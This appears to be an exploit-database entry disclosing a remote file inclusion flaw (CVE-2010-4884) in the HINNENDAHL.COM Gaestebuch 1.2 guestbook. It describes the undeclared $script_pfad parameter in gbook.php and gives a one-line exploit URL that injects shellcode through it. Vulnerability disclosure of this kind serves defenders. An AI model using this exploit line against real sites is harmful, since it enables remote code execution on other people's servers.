Gaestebuch 1.2 - Remote File Inclusion
| EKU-ID: 21206 | CVE: CVE-2010-4884;OSVDB-76115 | OSVDB-ID: |
| Author: bd0rk | Published: 2010-08-26 | Verified:
 |
| Download: | ||
Rating☆☆☆☆☆ |
| EKU-ID: 21206 | CVE: CVE-2010-4884;OSVDB-76115 | OSVDB-ID: |
| Author: bd0rk | Published: 2010-08-26 | Verified:
|
| Download: | ||
Rating☆☆☆☆☆ |
########################################################
# #
# HINNENDAHL.COM Gaestebuch 1.2 #
# #
# Remote File Inclusion Vulnerability #
# #
# by bd0rk || SOH-Crew # # #
# www.soh-crew.it.tt #
# #
# Contact: bd0rk[at]hackermail.com #
# #
########################################################
[~] Affected-Software: HINNENDAHL.COM Gaestebuch 1.2
[~] Vendor: http://www.hinnendahl.com/
[~] Download: http://www.hinnendahl.com/index.php?seite=download
[*] Greetz: inj3ct0r, DNX, Chip D3 Bi0s
Description: The $script_pfad parameter in /guestbook/gbook.php
isn't declared before require. So an attacker can execute some
php-shellcode about it. (line 3 - 4)
[+]Exploit: http://www.example.com/guestbook/gbook.php?script_pfad=[SHELLCODE]
### The 21 years old, german Hacker bd0rk ### <---white-hat :-)